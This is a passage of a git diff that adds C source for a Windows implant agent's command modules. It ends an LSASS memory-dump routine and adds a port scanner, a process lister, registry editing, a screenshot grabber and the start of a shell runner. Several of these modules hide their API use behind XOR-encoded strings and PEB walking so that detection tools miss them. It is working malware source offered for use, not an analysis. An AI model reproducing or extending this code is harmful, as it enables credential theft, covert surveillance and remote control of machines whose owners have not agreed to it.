*)malloc(0x10000); + if (rbuf) { + for (int i = 0; i < n_regs; i++) { + uint64_t left = regs[i].size; + ULONG_PTR cursor = (ULONG_PTR)regs[i].start; + while (left > 0) { + SIZE_T chunk = (SIZE_T)(left > 0x10000 ? 0x10000 : left); + SIZE_T rd = 0; + { _lNtRVM_t _r = _lsass_nrvm(); + if (_r) _r(hp, (PVOID)cursor, rbuf, chunk, &rd); } + if (!rd) { + memset(rbuf, 0, chunk); + rd = chunk; + } + _wf(hf, rbuf, (DWORD)rd); + cursor += rd; + left -= rd; + } + } + free(rbuf); + } + + CloseHandle(hf); + CloseHandle(hp); + free(mods); + free(regs); + + LARGE_INTEGER fsz = {0}; + HANDLE hf2 = CreateFileA(dump_path, GENERIC_READ, FILE_SHARE_READ, + NULL, OPEN_EXISTING, 0, NULL); + if (hf2 != INVALID_HANDLE_VALUE) { + GetFileSizeEx(hf2, &fsz); + CloseHandle(hf2); + } + + snprintf(output_buf, output_size, + "[ld] ok pid=%lu mods=%d regions=%d\n" + " path: %s (%llu bytes)\n" + " download: download %s\n", + (unsigned long)pid, n_mods, n_regs, + dump_path, (unsigned long long)fsz.QuadPart, + dump_path); + return 0; +} diff --git a/agent/src/commands/portscan.c b/agent/src/commands/portscan.c new file mode 100644 index 0000000..959ee1c --- /dev/null +++ b/agent/src/commands/portscan.c @@ -0,0 +1,143 @@ +#ifndef FD_SETSIZE +#define FD_SETSIZE 512 +#endif +#include "commands.h" +#include +#include +#include +#include +#include +#include + +#define SCAN_BATCH 256 + +static int _scan_batch(const char *host, + unsigned short *ports, int nports, + int timeout_ms, + char *out, size_t outsz, size_t *pos) +{ + SOCKET socks[SCAN_BATCH]; + int valid[SCAN_BATCH]; + struct addrinfo *res[SCAN_BATCH]; + + for (int i = 0; i < nports; i++) { + socks[i] = INVALID_SOCKET; + valid[i] = 0; + res[i] = NULL; + } + + /* start non-blocking connects */ + for (int i = 0; i < nports; i++) { + char portstr[8]; + snprintf(portstr, sizeof(portstr), "%u", ports[i]); + + struct addrinfo hints; + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + + if (getaddrinfo(host, portstr, &hints, &res[i]) != 0 || !res[i]) + continue; + + socks[i] = socket(res[i]->ai_family, SOCK_STREAM, IPPROTO_TCP); + if (socks[i] == INVALID_SOCKET) { + freeaddrinfo(res[i]); res[i] = NULL; + continue; + } + + /* Non-blocking */ + u_long nb = 1; + ioctlsocket(socks[i], FIONBIO, &nb); + + connect(socks[i], res[i]->ai_addr, (int)res[i]->ai_addrlen); + /* WSAEWOULDBLOCK expected */ + valid[i] = 1; + } + + /* wait for results */ + struct timeval tv; + tv.tv_sec = timeout_ms / 1000; + tv.tv_usec = (timeout_ms % 1000) * 1000; + + fd_set wset, eset; + FD_ZERO(&wset); + FD_ZERO(&eset); + + for (int i = 0; i < nports; i++) { + if (valid[i] && socks[i] != INVALID_SOCKET) { + FD_SET(socks[i], &wset); + FD_SET(socks[i], &eset); + } + } + + select(0, NULL, &wset, &eset, &tv); + + int found = 0; + for (int i = 0; i < nports; i++) { + if (!valid[i] || socks[i] == INVALID_SOCKET) goto cleanup; + + if (FD_ISSET(socks[i], &wset)) { + /* Check SO_ERROR — 0 means connected */ + int err = 0; + int elen = sizeof(err); + getsockopt(socks[i], SOL_SOCKET, SO_ERROR, + (char *)&err, &elen); + if (err == 0) { + int n = snprintf(out + *pos, outsz - *pos, + " open %s:%u\n", host, ports[i]); + if (n > 0 && (size_t)n < outsz - *pos) *pos += (size_t)n; + found++; + } + } + + cleanup: + if (socks[i] != INVALID_SOCKET) { + closesocket(socks[i]); + socks[i] = INVALID_SOCKET; + } + if (res[i]) { freeaddrinfo(res[i]); res[i] = NULL; } + } + return found; +} + +int cmd_portscan(const char *host, unsigned short start, unsigned short end, + int timeout_ms, char *output_buf, size_t output_size) +{ + WSADATA wsa; + WSAStartup(MAKEWORD(2, 2), &wsa); + + if (!host || !host[0] || start > end) { + snprintf(output_buf, output_size, + "[portscan] usage: portscan - [timeout_ms]\n"); + return -1; + } + + if (timeout_ms <= 0) timeout_ms = 500; + + size_t pos = 0; + int n = snprintf(output_buf + pos, output_size - pos, + "[portscan] %s %u-%u timeout=%dms\n", + host, start, end, timeout_ms); + if (n > 0) pos += (size_t)n; + + unsigned short batch[SCAN_BATCH]; + int bsz = 0; + int total = 0; + + for (unsigned int p = start; p <= (unsigned int)end; p++) { + batch[bsz++] = (unsigned short)p; + if (bsz == SCAN_BATCH || p == (unsigned int)end) { + total += _scan_batch(host, batch, bsz, timeout_ms, + output_buf, output_size, &pos); + bsz = 0; + /* Bail if output nearly full */ + if (pos + 256 >= output_size) break; + } + } + + n = snprintf(output_buf + pos, output_size - pos, + "[portscan] done %d open\n", total); + if (n > 0 && (size_t)n < output_size - pos) pos += (size_t)n; + + return 0; +} diff --git a/agent/src/commands/ps.c b/agent/src/commands/ps.c new file mode 100644 index 0000000..ce7d919 --- /dev/null +++ b/agent/src/commands/ps.c @@ -0,0 +1,115 @@ +#include "commands.h" +#include "adv_lazy.h" +#include "peb_walk.h" +#include "evs_strings.h" +#include +#include +#include +#include +#include + +/* list running processes with PID, PPID, arch and integrity */ + +typedef BOOL (WINAPI *IsWow64Process_t)(HANDLE, PBOOL); +static IsWow64Process_t s_wow64 = NULL; + +static void _init_wow64(void) +{ + if (s_wow64) return; + char _dn[13], _fn[16]; + EVS_D(_dn, EVS_dll_kernel32); EVS_D(_fn, EVS_fn_IsWow64Process); + HMODULE k32 = _peb_module(_dn); SecureZeroMemory(_dn, sizeof(_dn)); + if (k32) s_wow64 = (IsWow64Process_t)(void *)GetProcAddress(k32, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); +} + +static const char *_arch(HANDLE hproc) +{ + _init_wow64(); + if (!s_wow64) return "?"; + BOOL wow64 = FALSE; + return (s_wow64(hproc, &wow64) && wow64) ? "x86" : "x64"; +} + +static const char *_integrity(HANDLE hproc) +{ + HANDLE htoken = NULL; + { const adv_api_t *_a = adv_get(); + if (!_a->OpenProcessToken || !_a->OpenProcessToken(hproc, TOKEN_QUERY, &htoken)) + return "?"; } + + DWORD needed = 0; + GetTokenInformation(htoken, TokenIntegrityLevel, NULL, 0, &needed); + if (!needed) { CloseHandle(htoken); return "?"; } + + TOKEN_MANDATORY_LABEL *tml = (TOKEN_MANDATORY_LABEL *)malloc(needed); + if (!tml) { CloseHandle(htoken); return "?"; } + + const char *label = "?"; + if (GetTokenInformation(htoken, TokenIntegrityLevel, tml, needed, &needed)) { + DWORD rid = *GetSidSubAuthority(tml->Label.Sid, + (DWORD)(*GetSidSubAuthorityCount(tml->Label.Sid) - 1)); + if (rid >= SECURITY_MANDATORY_SYSTEM_RID) label = "system"; + else if (rid >= SECURITY_MANDATORY_HIGH_RID) label = "high"; + else if (rid >= SECURITY_MANDATORY_MEDIUM_RID) label = "med"; + else if (rid >= SECURITY_MANDATORY_LOW_RID) label = "low"; + else label = "untrust"; + } + free(tml); + CloseHandle(htoken); + return label; +} + +int cmd_ps(char *output_buf, size_t output_size) +{ + if (!output_buf || output_size < 128) return -1; + output_buf[0] = '\0'; + + int hdr = snprintf(output_buf, output_size, + "%-8s %-8s %-5s %-8s %s\n" + "%-8s %-8s %-5s %-8s %s\n", + "PID", "PPID", "ARCH", "INTEGR.", "NAME", + "---", "----", "----", "-------", "----"); + if (hdr < 0 || (size_t)hdr >= output_size) return 0; + + size_t off = (size_t)hdr; + + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) { + snprintf(output_buf + off, output_size - off, "[ps] snapshot failed\n"); + return -1; + } + + PROCESSENTRY32 pe; + pe.dwSize = sizeof(pe); + if (!Process32First(snap, &pe)) { CloseHandle(snap); return -1; } + + do { + const char *arch = "?"; + const char *integ = "?"; + + HANDLE hproc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, + FALSE, pe.th32ProcessID); + if (hproc) { + arch = _arch(hproc); + integ = _integrity(hproc); + CloseHandle(hproc); + } + + int n = snprintf(output_buf + off, output_size - off, + "%-8lu %-8lu %-5s %-8s %s\n", + (unsigned long)pe.th32ProcessID, + (unsigned long)pe.th32ParentProcessID, + arch, integ, pe.szExeFile); + if (n > 0) off += (size_t)n; + + if (off + 128 >= output_size) { + snprintf(output_buf + off, output_size - off, "[...truncated]\n"); + break; + } + + } while (Process32Next(snap, &pe)); + + CloseHandle(snap); + return 0; +} diff --git a/agent/src/commands/reg.c b/agent/src/commands/reg.c new file mode 100644 index 0000000..a93200a --- /dev/null +++ b/agent/src/commands/reg.c @@ -0,0 +1,309 @@ +#include "commands.h" +#include +#include +#include +#include + +/* parse hive prefix and return root HKEY */ + +static HKEY _hive(const char *keypath, const char **subkey) +{ + static const struct { const char *pfx; HKEY hive; } map[] = { + {"HKEY_LOCAL_MACHINE\\", HKEY_LOCAL_MACHINE}, + {"HKLM\\", HKEY_LOCAL_MACHINE}, + {"HKEY_CURRENT_USER\\", HKEY_CURRENT_USER}, + {"HKCU\\", HKEY_CURRENT_USER}, + {"HKEY_USERS\\", HKEY_USERS}, + {"HKU\\", HKEY_USERS}, + {"HKEY_CLASSES_ROOT\\", HKEY_CLASSES_ROOT}, + {"HKCR\\", HKEY_CLASSES_ROOT}, + {"HKEY_CURRENT_CONFIG\\", HKEY_CURRENT_CONFIG}, + {"HKCC\\", HKEY_CURRENT_CONFIG}, + }; + for (int i = 0; i < (int)(sizeof(map)/sizeof(map[0])); i++) { + size_t len = strlen(map[i].pfx); + if (_strnicmp(keypath, map[i].pfx, len) == 0) { + *subkey = keypath + len; + return map[i].hive; + } + } + *subkey = keypath; + return NULL; +} + +static const char *_type_name(DWORD t) +{ + switch (t) { + case REG_SZ: return "REG_SZ"; + case REG_EXPAND_SZ: return "REG_EXPAND_SZ"; + case REG_MULTI_SZ: return "REG_MULTI_SZ"; + case REG_DWORD: return "REG_DWORD"; + case REG_QWORD: return "REG_QWORD"; + case REG_BINARY: return "REG_BINARY"; + case REG_NONE: return "REG_NONE"; + default: return "REG_UNKNOWN"; + } +} + +/* Format a registry value into buf */ +static int _fmt_value(const char *name, DWORD type, + const BYTE *data, DWORD datalen, + char *buf, size_t bufsz) +{ + char val[1024] = {0}; + + switch (type) { + case REG_SZ: + case REG_EXPAND_SZ: + snprintf(val, sizeof(val), "\"%.*s\"", (int)datalen, (const char *)data); + break; + + case REG_MULTI_SZ: { + /* NUL-separated list */ + size_t pos = 0; + const char *s = (const char *)data; + while (s < (const char *)data + datalen && *s) { + int n = snprintf(val + pos, sizeof(val) - pos, "%s; ", s); + if (n > 0) pos += (size_t)n; + s += strlen(s) + 1; + } + break; + } + + case REG_DWORD: + if (datalen >= 4) { + DWORD dw; + memcpy(&dw, data, 4); + snprintf(val, sizeof(val), "0x%08lX (%lu)", dw, dw); + } + break; + + case REG_QWORD: + if (datalen >= 8) { + ULONGLONG qw; + memcpy(&qw, data, 8); + snprintf(val, sizeof(val), "0x%016llX", qw); + } + break; + + case REG_BINARY: { + size_t pos = 0; + for (DWORD i = 0; i < datalen && pos + 3 < sizeof(val); i++) { + snprintf(val + pos, sizeof(val) - pos, "%02X ", data[i]); + pos += 3; + } + break; + } + + default: + snprintf(val, sizeof(val), "", datalen); + break; + } + + return snprintf(buf, bufsz, " %-30s %-14s %s\n", + name[0] ? name : "(Default)", _type_name(type), val); +} + +/* query one value or enumerate all values in a key */ + +int cmd_reg_query(const char *keypath, const char *valname, + char *output_buf, size_t output_size) +{ + const char *subkey = NULL; + HKEY hive = _hive(keypath, &subkey); + if (!hive) { + snprintf(output_buf, output_size, + "[reg] unknown hive in: %s\n", keypath); + return -1; + } + + HKEY hk; + LONG rc = RegOpenKeyExA(hive, subkey, 0, KEY_READ, &hk); + if (rc != ERROR_SUCCESS) { + snprintf(output_buf, output_size, + "[reg] RegOpenKeyEx failed: %ld\n", rc); + return -1; + } + + size_t pos = 0; + int n = snprintf(output_buf + pos, output_size - pos, + "%s\n", keypath); + if (n > 0) pos += (size_t)n; + + if (valname && valname[0]) { + /* query single value */ + BYTE buf[4096]; + DWORD datalen = sizeof(buf); + DWORD type = 0; + rc = RegQueryValueExA(hk, valname, NULL, &type, buf, &datalen); + if (rc == ERROR_SUCCESS) { + char line[2048]; + _fmt_value(valname, type, buf, datalen, line, sizeof(line)); + n = snprintf(output_buf + pos, output_size - pos, "%s", line); + if (n > 0) pos += (size_t)n; + } else { + n = snprintf(output_buf + pos, output_size - pos, + " [not found: %s]\n", valname); + if (n > 0) pos += (size_t)n; + } + } else { + /* enumerate all values */ + DWORD idx = 0; + for (;;) { + char name[256]; + BYTE data[4096]; + DWORD namesz = sizeof(name); + DWORD datasz = sizeof(data); + DWORD type = 0; + rc = RegEnumValueA(hk, idx++, name, &namesz, NULL, + &type, data, &datasz); + if (rc == ERROR_NO_MORE_ITEMS) break; + if (rc != ERROR_SUCCESS) break; + + char line[2048]; + _fmt_value(name, type, data, datasz, line, sizeof(line)); + n = snprintf(output_buf + pos, output_size - pos, "%s", line); + if (n > 0 && (size_t)n < output_size - pos) + pos += (size_t)n; + else + break; + } + if (idx == 1) { + n = snprintf(output_buf + pos, output_size - pos, + " (no values)\n"); + if (n > 0) pos += (size_t)n; + } + } + + RegCloseKey(hk); + return 0; +} + +/* set a registry value */ + +int cmd_reg_set(const char *keypath, const char *valname, + const char *type_str, const char *value, + char *output_buf, size_t output_size) +{ + const char *subkey = NULL; + HKEY hive = _hive(keypath, &subkey); + if (!hive) { + snprintf(output_buf, output_size, + "[reg] unknown hive in: %s\n", keypath); + return -1; + } + + /* resolve type string */ + DWORD type = REG_SZ; + if (_stricmp(type_str, "REG_DWORD") == 0 || _stricmp(type_str, "dword") == 0) + type = REG_DWORD; + else if (_stricmp(type_str, "REG_BINARY") == 0 || _stricmp(type_str, "binary") == 0) + type = REG_BINARY; + else if (_stricmp(type_str, "REG_EXPAND_SZ") == 0 || _stricmp(type_str, "expand_sz") == 0) + type = REG_EXPAND_SZ; + else if (_stricmp(type_str, "REG_MULTI_SZ") == 0 || _stricmp(type_str, "multi_sz") == 0) + type = REG_MULTI_SZ; + /* else default REG_SZ */ + + HKEY hk; + LONG rc = RegCreateKeyExA(hive, subkey, 0, NULL, + REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, + NULL, &hk, NULL); + if (rc != ERROR_SUCCESS) { + snprintf(output_buf, output_size, + "[reg] create failed: %ld\n", rc); + return -1; + } + + LONG set_rc = ERROR_SUCCESS; + + switch (type) { + case REG_DWORD: { + DWORD dw = (DWORD)strtoul(value, NULL, 0); + set_rc = RegSetValueExA(hk, valname, 0, REG_DWORD, + (const BYTE *)&dw, sizeof(DWORD)); + break; + } + case REG_BINARY: { + /* parse hex string to bytes */ + size_t vlen = strlen(value); + BYTE *bin = (BYTE *)malloc((vlen / 2) + 1); + if (!bin) { RegCloseKey(hk); return -1; } + size_t blen = 0; + for (size_t i = 0; i + 1 < vlen; i += 2) { + char hx[3] = {value[i], value[i+1], '\0'}; + bin[blen++] = (BYTE)strtoul(hx, NULL, 16); + } + set_rc = RegSetValueExA(hk, valname, 0, REG_BINARY, bin, (DWORD)blen); + free(bin); + break; + } + default: /* REG_SZ, REG_EXPAND_SZ */ + set_rc = RegSetValueExA(hk, valname, 0, type, + (const BYTE *)value, + (DWORD)(strlen(value) + 1)); + break; + } + + RegCloseKey(hk); + + if (set_rc == ERROR_SUCCESS) { + snprintf(output_buf, output_size, + "[reg] set %s\\%s (%s) = %s\n", + keypath, valname, type_str, value); + return 0; + } + snprintf(output_buf, output_size, + "[reg] set failed: %ld\n", set_rc); + return -1; +} + +/* delete a registry key or value */ + +int cmd_reg_delete(const char *keypath, const char *valname, + char *output_buf, size_t output_size) +{ + const char *subkey = NULL; + HKEY hive = _hive(keypath, &subkey); + if (!hive) { + snprintf(output_buf, output_size, + "[reg] unknown hive in: %s\n", keypath); + return -1; + } + + LONG rc; + + if (!valname || !valname[0]) { + /* delete the key itself */ + rc = RegDeleteKeyA(hive, subkey); + if (rc == ERROR_SUCCESS) { + snprintf(output_buf, output_size, + "[reg] deleted key: %s\n", keypath); + return 0; + } + snprintf(output_buf, output_size, + "[reg] RegDeleteKey failed: %ld\n", rc); + return -1; + } + + /* delete specific value */ + HKEY hk; + rc = RegOpenKeyExA(hive, subkey, 0, KEY_SET_VALUE, &hk); + if (rc != ERROR_SUCCESS) { + snprintf(output_buf, output_size, + "[reg] RegOpenKeyEx failed: %ld\n", rc); + return -1; + } + + rc = RegDeleteValueA(hk, valname); + RegCloseKey(hk); + + if (rc == ERROR_SUCCESS) { + snprintf(output_buf, output_size, + "[reg] deleted value: %s \\ %s\n", keypath, valname); + return 0; + } + snprintf(output_buf, output_size, + "[reg] RegDeleteValue failed: %ld\n", rc); + return -1; +} diff --git a/agent/src/commands/screenshot.c b/agent/src/commands/screenshot.c new file mode 100644 index 0000000..a8dc99f --- /dev/null +++ b/agent/src/commands/screenshot.c @@ -0,0 +1,236 @@ +#include "commands.h" +#include "crypto.h" +#include "evs_strings.h" +#include +#include +#include +#include + +/* ── Dynamic GDI/USER32 dispatch — removes screen-capture IAT fingerprint ─── */ + +typedef HDC (WINAPI *pGetDC_t) (HWND); +typedef int (WINAPI *pReleaseDC_t) (HWND, HDC); +typedef int (WINAPI *pGetDeviceCaps_t) (HDC, int); +typedef HDC (WINAPI *pCreateCompatibleDC_t) (HDC); +typedef HBITMAP(WINAPI *pCreateCompatibleBitmap_t)(HDC, int, int); +typedef HGDIOBJ(WINAPI *pSelectObject_t) (HDC, HGDIOBJ); +typedef BOOL (WINAPI *pBitBlt_t) (HDC,int,int,int,int,HDC,int,int,DWORD); +typedef BOOL (WINAPI *pStretchBlt_t) (HDC,int,int,int,int,HDC,int,int,int,int,DWORD); +typedef BOOL (WINAPI *pDeleteDC_t) (HDC); +typedef BOOL (WINAPI *pDeleteObject_t) (HGDIOBJ); +typedef HGDIOBJ(WINAPI *pGetStockObject_t) (int); +typedef int (WINAPI *pSetStretchBltMode_t) (HDC, int); +typedef BOOL (WINAPI *pSetBrushOrgEx_t) (HDC, int, int, POINT *); +typedef int (WINAPI *pGetDIBits_t) (HDC,HBITMAP,UINT,UINT,LPVOID,LPBITMAPINFO,UINT); + +typedef struct { + pGetDC_t GetDC; + pReleaseDC_t ReleaseDC; + pGetDeviceCaps_t GetDeviceCaps; + pCreateCompatibleDC_t CreateCompatibleDC; + pCreateCompatibleBitmap_t CreateCompatibleBitmap; + pSelectObject_t SelectObject; + pBitBlt_t BitBlt; + pStretchBlt_t StretchBlt; + pDeleteDC_t DeleteDC; + pDeleteObject_t DeleteObject; + pGetStockObject_t GetStockObject; + pSetStretchBltMode_t SetStretchBltMode; + pSetBrushOrgEx_t SetBrushOrgEx; + pGetDIBits_t GetDIBits; +} ss_api_t; + +static ss_api_t _ss = {0}; + +static int _ss_init(void) +{ + if (_ss.BitBlt) return 0; + + char _fn[32]; + +#define _DEC_GPA(dll, enc, dst) do { \ + EVS_D(_fn, enc); \ + (dst) = (void *)GetProcAddress(dll, _fn); \ + SecureZeroMemory(_fn, sizeof(enc) + 1); } while(0) + + char _dll[12]; + EVS_D(_dll, EVS_dll_gdi32); + HMODULE hg = LoadLibraryA(_dll); + SecureZeroMemory(_dll, sizeof(_dll)); + + char _udll[12]; + EVS_D(_udll, EVS_dll_user32); + HMODULE hu = LoadLibraryA(_udll); + SecureZeroMemory(_udll, sizeof(_udll)); + + if (!hg || !hu) return -1; + + _DEC_GPA(hu, EVS_fn_GetDC, _ss.GetDC); + _DEC_GPA(hu, EVS_fn_ReleaseDC, _ss.ReleaseDC); + _DEC_GPA(hg, EVS_fn_GetDeviceCaps, _ss.GetDeviceCaps); + _DEC_GPA(hg, EVS_fn_CreateCompatibleDC, _ss.CreateCompatibleDC); + _DEC_GPA(hg, EVS_fn_CreateCompatibleBitmap, _ss.CreateCompatibleBitmap); + _DEC_GPA(hg, EVS_fn_SelectObject, _ss.SelectObject); + _DEC_GPA(hg, EVS_fn_BitBlt, _ss.BitBlt); + _DEC_GPA(hg, EVS_fn_StretchBlt, _ss.StretchBlt); + _DEC_GPA(hg, EVS_fn_DeleteDC, _ss.DeleteDC); + _DEC_GPA(hg, EVS_fn_DeleteObject, _ss.DeleteObject); + _DEC_GPA(hg, EVS_fn_GetStockObject, _ss.GetStockObject); + _DEC_GPA(hg, EVS_fn_SetStretchBltMode, _ss.SetStretchBltMode); + _DEC_GPA(hg, EVS_fn_SetBrushOrgEx, _ss.SetBrushOrgEx); + _DEC_GPA(hg, EVS_fn_GetDIBits, _ss.GetDIBits); +#undef _DEC_GPA + + return _ss.BitBlt ? 0 : -1; +} + +int cmd_screenshot(char *output_buf, size_t output_size) +{ + if (!output_buf || output_size < 128) return -1; + output_buf[0] = '\0'; + + if (_ss_init() != 0) { + snprintf(output_buf, output_size, "e:gdi\n"); + return -1; + } + + HDC hdc_screen = _ss.GetDC(NULL); + if (!hdc_screen) { + snprintf(output_buf, output_size, + "e:dc %lu\n", GetLastError()); + return -1; + } + + int src_w = _ss.GetDeviceCaps(hdc_screen, HORZRES); + int src_h = _ss.GetDeviceCaps(hdc_screen, VERTRES); + if (src_w <= 0 || src_h <= 0) { + _ss.ReleaseDC(NULL, hdc_screen); + snprintf(output_buf, output_size, "e:caps\n"); + return -1; + } + +#define SS_MAX_BMP_BYTES (6u * 1024u * 1024u) + int sw = src_w, sh = src_h; + while ((size_t)(((sw * 3u + 3u) & ~3u)) * (size_t)sh > SS_MAX_BMP_BYTES) { + sw = (sw * 3) / 4; + sh = (sh * 3) / 4; + if (sw < 320) { sw = 320; sh = 240; break; } + } + + HDC hdc_cap = _ss.CreateCompatibleDC(hdc_screen); + if (!hdc_cap) { + _ss.ReleaseDC(NULL, hdc_screen); + snprintf(output_buf, output_size, "e:cdc\n"); + return -1; + } + HBITMAP hbmp_cap = _ss.CreateCompatibleBitmap(hdc_screen, src_w, src_h); + if (!hbmp_cap) { + _ss.DeleteDC(hdc_cap); _ss.ReleaseDC(NULL, hdc_screen); + snprintf(output_buf, output_size, "e:cbm\n"); + return -1; + } + _ss.SelectObject(hdc_cap, hbmp_cap); + _ss.BitBlt(hdc_cap, 0, 0, src_w, src_h, hdc_screen, 0, 0, SRCCOPY | CAPTUREBLT); + _ss.ReleaseDC(NULL, hdc_screen); + + HBITMAP hbmp_final; + if (sw == src_w && sh == src_h) { + _ss.SelectObject(hdc_cap, _ss.GetStockObject(NULL_BRUSH)); + hbmp_final = hbmp_cap; + _ss.DeleteDC(hdc_cap); + } else { + HDC hdc_scale = _ss.CreateCompatibleDC(hdc_cap); + hbmp_final = _ss.CreateCompatibleBitmap(hdc_cap, sw, sh); + if (!hdc_scale || !hbmp_final) { + if (hdc_scale) _ss.DeleteDC(hdc_scale); + if (hbmp_final) _ss.DeleteObject(hbmp_final); + _ss.SelectObject(hdc_cap, _ss.GetStockObject(NULL_BRUSH)); + _ss.DeleteObject(hbmp_cap); _ss.DeleteDC(hdc_cap); + snprintf(output_buf, output_size, "e:sc\n"); + return -1; + } + HGDIOBJ old_sc = _ss.SelectObject(hdc_scale, hbmp_final); + _ss.SetStretchBltMode(hdc_scale, HALFTONE); + _ss.SetBrushOrgEx(hdc_scale, 0, 0, NULL); + _ss.StretchBlt(hdc_scale, 0, 0, sw, sh, + hdc_cap, 0, 0, src_w, src_h, SRCCOPY); + _ss.SelectObject(hdc_scale, old_sc); + _ss.DeleteDC(hdc_scale); + _ss.SelectObject(hdc_cap, _ss.GetStockObject(NULL_BRUSH)); + _ss.DeleteObject(hbmp_cap); + _ss.DeleteDC(hdc_cap); + } + + BITMAPINFOHEADER bih; + memset(&bih, 0, sizeof(bih)); + bih.biSize = sizeof(BITMAPINFOHEADER); + bih.biWidth = sw; + bih.biHeight = sh; + bih.biPlanes = 1; + bih.biBitCount = 24; + bih.biCompression = BI_RGB; + + DWORD row_stride = (((DWORD)sw * 3u) + 3u) & ~3u; + DWORD pixel_sz = row_stride * (DWORD)sh; + bih.biSizeImage = pixel_sz; + + uint8_t *pixels = (uint8_t *)calloc(1, pixel_sz); + if (!pixels) { + _ss.DeleteObject(hbmp_final); + snprintf(output_buf, output_size, "e:px\n"); + return -1; + } + + HDC hdc_ref = _ss.GetDC(NULL); + int lines = _ss.GetDIBits(hdc_ref, hbmp_final, 0, (UINT)sh, pixels, + (BITMAPINFO *)&bih, DIB_RGB_COLORS); + _ss.ReleaseDC(NULL, hdc_ref); + _ss.DeleteObject(hbmp_final); + + if (!lines) { + free(pixels); + snprintf(output_buf, output_size, "e:dib %lu\n", GetLastError()); + return -1; + } + + DWORD pixel_offset = 14u + (DWORD)sizeof(BITMAPINFOHEADER); + DWORD bmp_sz = pixel_offset + pixel_sz; + + uint8_t *bmp = (uint8_t *)malloc(bmp_sz); + if (!bmp) { + free(pixels); + snprintf(output_buf, output_size, "e:bm\n"); + return -1; + } + + bmp[0] = 'B'; bmp[1] = 'M'; + memcpy(bmp + 2, &bmp_sz, 4); + memset(bmp + 6, 0, 4); + memcpy(bmp + 10, &pixel_offset, 4); + memcpy(bmp + 14, &bih, sizeof(BITMAPINFOHEADER)); + memcpy(bmp + pixel_offset, pixels, pixel_sz); + free(pixels); + + char *b64 = base64_encode(bmp, bmp_sz); + free(bmp); + if (!b64) { + snprintf(output_buf, output_size, "e:b64\n"); + return -1; + } + + int header_len = snprintf(output_buf, output_size, "ss:%dx%d\n", sw, sh); + if (header_len < 0 || (size_t)header_len >= output_size) { + free(b64); + snprintf(output_buf, output_size, "e:hdr\n"); + return -1; + } + + size_t remaining = output_size - (size_t)header_len - 1; + size_t b64_len = strlen(b64); + if (b64_len > remaining) b64_len = remaining; + + memcpy(output_buf + header_len, b64, b64_len); + output_buf[header_len + b64_len] = '\0'; + free(b64); + return 0; +} diff --git a/agent/src/commands/shell.c b/agent/src/commands/shell.c new file mode 100644 index 0000000..ec63e76 --- /dev/null +++ b/agent/src/commands/shell.c @@ -0,0 +1,206 @@ +#include "commands.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include +#include +#include +#include + +/* GetNativeSystemInfo — removes from IAT */ +typedef void (WINAPI *_GNS_t)(LPSYSTEM_INFO); +static void _gns(LPSYSTEM_INFO si) { + static _GNS_t fn = NULL; + if (!fn) { + char fs[22], ks[14]; volatile unsigned char xk = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_GetNativeSystemInfo); i++) fs[i] = (char)(EVS_fn_GetNativeSystemInfo[i] ^ xk); + fs[sizeof(EVS_fn_GetNativeSystemInfo)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_kernel32); i++) ks[i] = (char)(EVS_dll_kernel32[i] ^ xk); + ks[sizeof(EVS_dll_kernel32)] = '\0'; + HMODULE m = _peb_module(ks); SecureZeroMemory(ks, sizeof(ks)); + if (m) fn = (_GNS_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + if (fn) fn(si); + else GetSystemInfo(si); +} + +/* GetComputerNameA — removes from IAT */ +typedef BOOL (WINAPI *_SGCN_t)(LPSTR, LPDWORD); +static BOOL _sgcna(LPSTR buf, LPDWORD sz) { + static _SGCN_t fn = NULL; + if (!fn) { + char fs[20], ks[14]; volatile unsigned char xk = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_GetComputerNameA); i++) fs[i] = (char)(EVS_fn_GetComputerNameA[i] ^ xk); + fs[sizeof(EVS_fn_GetComputerNameA)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_kernel32); i++) ks[i] = (char)(EVS_dll_kernel32[i] ^ xk); + ks[sizeof(EVS_dll_kernel32)] = '\0'; + HMODULE m = _peb_module(ks); SecureZeroMemory(ks, sizeof(ks)); + if (m) fn = (_SGCN_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn ? fn(buf, sz) : FALSE; +} + +/* GlobalMemoryStatusEx — removes from IAT */ +typedef BOOL (WINAPI *_GMSE_t)(LPMEMORYSTATUSEX); +static BOOL _gmse(LPMEMORYSTATUSEX p) { + static _GMSE_t fn = NULL; + if (!fn) { + char fs[22], ks[14]; volatile unsigned char xk = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_GlobalMemoryStatusEx); i++) fs[i] = (char)(EVS_fn_GlobalMemoryStatusEx[i] ^ xk); + fs[sizeof(EVS_fn_GlobalMemoryStatusEx)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_kernel32); i++) ks[i] = (char)(EVS_dll_kernel32[i] ^ xk); + ks[sizeof(EVS_dll_kernel32)] = '\0'; + HMODULE m = _peb_module(ks); SecureZeroMemory(ks, sizeof(ks)); + if (m) fn = (_GMSE_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn ? fn(p) : FALSE; +} + +/* run a shell command via cmd.exe and capture stdout+stderr */ +int cmd_shell(const char *cmdline, char *output_buf, size_t output_size) +{ + if (!cmdline || !output_buf || output_size == 0) return -1; + output_buf[0] = '\0'; + + /* create pipe for child output */ + SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES), NULL, TRUE }; + HANDLE pipe_rd = NULL, pipe_wr = NULL; + if (!CreatePipe(&pipe_rd, &pipe_wr, &sa, 0)) return -1; + + /* prevent read end from being inherited */ + if (!SetHandleInformation(pipe_rd, HANDLE_FLAG_INHERIT, 0)) { + CloseHandle(pipe_rd); CloseHandle(pipe_wr); + return -1; + } + + /* NUL as stdin so child doesn't block waiting for input */ + HANDLE hNull = CreateFileA("NUL", GENERIC_READ, + FILE_SHARE_READ | 